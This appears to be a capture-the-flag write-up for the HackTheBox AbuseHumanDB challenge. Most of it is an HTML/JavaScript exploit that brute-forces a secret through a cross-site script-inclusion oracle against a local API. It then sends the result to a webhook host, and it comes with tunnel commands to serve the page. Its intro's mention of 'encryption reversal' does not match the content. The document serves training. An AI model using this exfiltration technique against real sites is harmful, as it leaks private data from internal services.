Post

HackTheBox AbuseHumanDB Writeup

Explore the basics of cybersecurity in the AbuseHumanDB Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

Use a webhook service like https://app.interactsh.com/, a VPS with a public port, or a tunneling service to expose the service.

index.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<html>
<head></head>
<body>
<script type="text/javascript">
    flag_charset = "}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$()*,-[]_}";
    var flag = "HTB{";
    var charIndex = 0;
    const bruteForce = () => {
        var script = document.createElement("script");
        script.src = `//127.0.0.1:1337/api/entries/search?q=${flag}${flag_charset.charAt(charIndex)}`;
        document.body.appendChild(script);
        script.onload = () => {
            flag += flag_charset.charAt(charIndex);
            charIndex = 0;
            script.parentNode.removeChild(script);
            if (flag.slice(-1) != '}') {
                bruteForce();
            } else {
                img = new Image();
                img.src = 'https://webhook.com?flag=' + flag; // <-- WebHookUrl
            }
        };
        script.onerror = () => {
            script.parentNode.removeChild(script);
            charIndex += 1;
            bruteForce();
        };
    };
    bruteForce();
</script>
</body>
</html>
1
python -m http.server
1
ssh -R 80:localhost:8000 localhost.run

Send the tunnel HTTP URL in the Abusive Content URL and check your webhook.

Summary

The AbuseHumanDB Challenge on Hack The Box is an easy-level challenge where participants create a brute-force script in an HTML page to guess a flag, using a localhost.run tunnel to expose the server and capture the result via a webhook. This challenge offers a hands-on introduction to web vulnerabilities and flag retrieval techniques.

This post is licensed under CC BY 4.0 by the author.